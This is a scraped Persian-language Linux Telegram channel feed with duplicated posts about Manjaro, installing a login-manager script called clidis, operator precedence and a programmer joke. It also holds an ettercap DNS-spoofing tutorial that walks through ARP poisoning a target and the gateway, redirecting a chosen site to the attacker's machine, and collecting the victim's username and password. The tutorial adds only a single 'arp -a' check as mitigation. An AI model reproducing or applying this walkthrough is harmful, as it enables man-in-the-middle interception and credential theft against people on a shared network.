نمونه ی ( تا حدودی شخصی سازی شده ) از توزیع Manjaro Deepin نسخه ی آخر بعد از 3 هفته مورد استفاده قرار گرفتن
🐧 @linuxforlife | لینوکس فور لایف
🐧 @linuxforlife | لینوکس فور لایف
GNU/Linux(news) pinned «به نام خالق منطق Manjaro Deepin توزیع مانجارو یک توزیع بر پایه ی Arch Linux با مخازن خاص خودش هست که طی 2 یا 3 سال اخیر توجه عده ی زیادی از کاربران دنیای گنولینوکس رو به خودش جلب کرده؛ حالا قصد داریم در مورد یکی از بهترین نسخه های این توزیع خوب کمی موشکافانه…»
به نام خداوند جان و خرد
مفتخرم که اعلام کنم بعد از چند ماه تاخیر و امروز و فردا کردن بالاخره به کمک یکی از دوستان موفق شدیم اسکریپت مدیریت صفحه ی ورود فوق سبک خودمون به نام clidis ( کِلای دیس ) رو تکمیل کنیم.
امروز بعد از تست نهایی این اسکریپت بر روی گیتهاب به همراه اموزش نصب قرار گرفت و شما میتونید از همین لحظه اون رو برای خودتون نصب کنید و از کاهش مصرف رم چشم گیر خودتون لذت ببرید !
لینک گیت هاب پروژه :
https://github.com/virtualdemon/clidis
اموزش نصب فارسی :
1. اسکریپت رو به کمک wget یا curl دانلود و به پوشه ی هوم خودتون منتقل کنید :
1. ابتدا display manager فعلی خودتون رو غیر فعال کنید :
VirtualDemon
MisterH
🆔 @linuxforlife
مفتخرم که اعلام کنم بعد از چند ماه تاخیر و امروز و فردا کردن بالاخره به کمک یکی از دوستان موفق شدیم اسکریپت مدیریت صفحه ی ورود فوق سبک خودمون به نام clidis ( کِلای دیس ) رو تکمیل کنیم.
امروز بعد از تست نهایی این اسکریپت بر روی گیتهاب به همراه اموزش نصب قرار گرفت و شما میتونید از همین لحظه اون رو برای خودتون نصب کنید و از کاهش مصرف رم چشم گیر خودتون لذت ببرید !
لینک گیت هاب پروژه :
https://github.com/virtualdemon/clidis
اموزش نصب فارسی :
1. اسکریپت رو به کمک wget یا curl دانلود و به پوشه ی هوم خودتون منتقل کنید :
wget https://raw.githubusercontent.com/virtualdemon/clidis/master/clidis -O ~/.clidis
curl https://raw.githubusercontent.com/virtualdemon/clidis/master/clidis -o ~/.clidis
2. برای اجرای درست اسکریپت به اون دسترسی لازم رو بدید ( فقط یکبار زدن دستور کافیست ) :chmod +x ~/.clidis
3. وقتی که هیچ display manager ای ( هیچ محیط گرافیکی ای ) در حال اجرا نیست اسکریپت رو اجرا کنید :~/.clidis
اجرای خودکار بعد از لاگین کردن :1. ابتدا display manager فعلی خودتون رو غیر فعال کنید :
sudo systemctl disable display-manager.service
2. متن زیر رو به ابتدای فایل پروفایل شل خودتون اضافه کنید (برای zsh -> ~/.zprofile
و برای bash -> ~/.bash_profile
) :exec bash $HOME/.clidis
اگر نمیدونید از چه شلی استفاده میکنید از دستور زیر کمک بگیریدecho $SHELL
تهیه شده توسط :VirtualDemon
MisterH
🆔 @linuxforlife
جواب سوال ساده قبل:)👀
در مورد اولویت عملگرها حتما یه مطالعه داشته باشید; جواب 10 میشه
چرا؟ چون اولویت عملگر ضرب از اولویت عملگر جمع بیشتر هستش.
🐧 @linuxforlife | لینوکس فور لایف
در مورد اولویت عملگرها حتما یه مطالعه داشته باشید; جواب 10 میشه
چرا؟ چون اولویت عملگر ضرب از اولویت عملگر جمع بیشتر هستش.
🐧 @linuxforlife | لینوکس فور لایف
dns spoof
این روش برای گمراه کردن یا spoof در رنج ای پی خودمان هست
برنامه ettercap را نصب میکنیم برای شنود
sudo apt install ettercap
در فایل کانفیگ زیر ec_uid و ec_gid را صفر قرار میدهیم که در ابتدای فایل زیر هست
sudo vi /etc/ettercap/etter.conf
سپس به قسمت پایین فایل بالا میرویم که نوشته شده linux در قسمت
if you use iptables
دو خط پایین این قسمت را هشتک های قبل آن را پاک میکنیم که مربوط به کانفیگ فایروال هست
با کامند زیر برنامه به صورت گرافیکی اجرا میکنیم
sudo ettercap -G
برنامه که اجرا شد طبق دستورالعمل زیر عمل میکنیم
Sniff > Unified sniffing > Select your interface
اگر اسم کارت شبکه خود را نمیدانید در ترمینال با کامند زیر آن را پیدا کنید
sudo ifconfig
بعد از انتخاب کارت شبکه به صورت اتومات شروع به sniff میکند بنابراین آن را stop میکنیم
Start > Stop sniffing
سپس در برنامه برای اسکن هاست های در رنج ای پی خودمان به قسمت زیر میرویم
Hosts > Scan for hosts
خب در اینجا دو تا تارگت حداقل باید موجود باشه یکی gateway خودتان یکی دیگر هم به عنوان تارگت هست
برای شناسایی gateway خودمان میتونیم در ترمینال از طریق کامند زیر پیدا کنیم
sudo route -n
سپس در برنامه تارگت را به عنوان تارگت اول و خودتان را به عنوان تارگت دوم انتخاب کنید
بعد در برنامه برای تنظیم پروتکل مورد نظر به قسمت زیر رفته و پروتکل ARP که بر اساس mac address , ipv4 هست انتخاب میکنیم
MITM > ARP Poisonning >Sniff remote connections
سپس به قسمت پلاگین رفته و dns_spoof انتخاب میکنیم
Plugins > Manage the plugins >dns_spoof
خب حالا باید یک سایت را برای گمراه کردن انتخاب کنیم یعنی فرد مقابل وارد اون سایت مورد نظر بشه در واقع وارد سایت مد نظر شما شده و شما به راحتی با یک اسکریپت میتونید رمز عبور و یوزر نیم فرد مقابل برای خودتان بفرستید
ابتدا در کانفیگ سایت مورد نظر انتخاب میکنیم
sudo vi /etc/ettercap/etter.dns
در فایل کانفیگ بالا قتی که باز شد به پایین میرویم تا به microsoft.com برسیم در زبر آن به صورت زیر سایت مورد نظر اضافه میکنیم
victim site.com A myip
*.victim site.com A myip
سپس سیو میکنیم
حدالمکان روی سایت های معتبر امثال گوگل ست نکنید چون ممکنه ریدایرکت نکنه یا جیمیل فقط ۷۰ درصد اینکار میکنه
سپس ترمینال باز میکن و کامند زیر را بزنید
sudo service apache2 start
خب اگر میخواید ببینید که فرد قربانی چه سایتی را میبیند میتوانید به قسمت زیر بروید
cd /var/www/html»»»index.html
در این فایل ذخیره میشود یعنی قربانی هر بار به سایت مورد نظر میرود در واقع به فایل شما وارد شده است و به راحتی با یک اسکریپت میتوانید اطلاعات را از قربانی بگیرید
رفع مشکل
کامند زیر را در ترمینال بزنید
sudo arp -a
اگر مک آدرس و ای پی های شما در آن موجود بود پس شما فعلا مشکلی ندارید و اگر موجود نبود نسبت به تغییر dns خود اقدام کنید
#هک
#ضدهک
🆔 @linuxforlife
این روش برای گمراه کردن یا spoof در رنج ای پی خودمان هست
برنامه ettercap را نصب میکنیم برای شنود
sudo apt install ettercap
در فایل کانفیگ زیر ec_uid و ec_gid را صفر قرار میدهیم که در ابتدای فایل زیر هست
sudo vi /etc/ettercap/etter.conf
سپس به قسمت پایین فایل بالا میرویم که نوشته شده linux در قسمت
if you use iptables
دو خط پایین این قسمت را هشتک های قبل آن را پاک میکنیم که مربوط به کانفیگ فایروال هست
با کامند زیر برنامه به صورت گرافیکی اجرا میکنیم
sudo ettercap -G
برنامه که اجرا شد طبق دستورالعمل زیر عمل میکنیم
Sniff > Unified sniffing > Select your interface
اگر اسم کارت شبکه خود را نمیدانید در ترمینال با کامند زیر آن را پیدا کنید
sudo ifconfig
بعد از انتخاب کارت شبکه به صورت اتومات شروع به sniff میکند بنابراین آن را stop میکنیم
Start > Stop sniffing
سپس در برنامه برای اسکن هاست های در رنج ای پی خودمان به قسمت زیر میرویم
Hosts > Scan for hosts
خب در اینجا دو تا تارگت حداقل باید موجود باشه یکی gateway خودتان یکی دیگر هم به عنوان تارگت هست
برای شناسایی gateway خودمان میتونیم در ترمینال از طریق کامند زیر پیدا کنیم
sudo route -n
سپس در برنامه تارگت را به عنوان تارگت اول و خودتان را به عنوان تارگت دوم انتخاب کنید
بعد در برنامه برای تنظیم پروتکل مورد نظر به قسمت زیر رفته و پروتکل ARP که بر اساس mac address , ipv4 هست انتخاب میکنیم
MITM > ARP Poisonning >Sniff remote connections
سپس به قسمت پلاگین رفته و dns_spoof انتخاب میکنیم
Plugins > Manage the plugins >dns_spoof
خب حالا باید یک سایت را برای گمراه کردن انتخاب کنیم یعنی فرد مقابل وارد اون سایت مورد نظر بشه در واقع وارد سایت مد نظر شما شده و شما به راحتی با یک اسکریپت میتونید رمز عبور و یوزر نیم فرد مقابل برای خودتان بفرستید
ابتدا در کانفیگ سایت مورد نظر انتخاب میکنیم
sudo vi /etc/ettercap/etter.dns
در فایل کانفیگ بالا قتی که باز شد به پایین میرویم تا به microsoft.com برسیم در زبر آن به صورت زیر سایت مورد نظر اضافه میکنیم
victim site.com A myip
*.victim site.com A myip
سپس سیو میکنیم
حدالمکان روی سایت های معتبر امثال گوگل ست نکنید چون ممکنه ریدایرکت نکنه یا جیمیل فقط ۷۰ درصد اینکار میکنه
سپس ترمینال باز میکن و کامند زیر را بزنید
sudo service apache2 start
خب اگر میخواید ببینید که فرد قربانی چه سایتی را میبیند میتوانید به قسمت زیر بروید
cd /var/www/html»»»index.html
در این فایل ذخیره میشود یعنی قربانی هر بار به سایت مورد نظر میرود در واقع به فایل شما وارد شده است و به راحتی با یک اسکریپت میتوانید اطلاعات را از قربانی بگیرید
رفع مشکل
کامند زیر را در ترمینال بزنید
sudo arp -a
اگر مک آدرس و ای پی های شما در آن موجود بود پس شما فعلا مشکلی ندارید و اگر موجود نبود نسبت به تغییر dns خود اقدام کنید
#هک
#ضدهک
🆔 @linuxforlife
تغییر پسورد فراموش شده در توزیعهای گنو/لینوکس
لینک ویدیو در یوتیوب:
https://youtu.be/rmK43PPLsG8
🐧 @linuxforlife | لینوکس فور لایف
لینک ویدیو در یوتیوب:
https://youtu.be/rmK43PPLsG8
🐧 @linuxforlife | لینوکس فور لایف
a night for a programmer with a poor machine:
3:00 AM
- : it works! i know . failure is not an option!
* compiling program and running it *
3:30 AM
-: whoa!!! it works fine ! every thing is stable
4:00 AM
-: ok it's doing right! the algorithm is stable and i'm gonna work with it for testing.
4:01 AM
-: why no input works!
* sigh*
5:00 AM
-: oh i find it now! the whole system is crashed.....
*crying* 🐧 : @linuxforlife
3:00 AM
- : it works! i know . failure is not an option!
* compiling program and running it *
3:30 AM
-: whoa!!! it works fine ! every thing is stable
4:00 AM
-: ok it's doing right! the algorithm is stable and i'm gonna work with it for testing.
4:01 AM
-: why no input works!
* sigh*
5:00 AM
-: oh i find it now! the whole system is crashed.....
*crying* 🐧 : @linuxforlife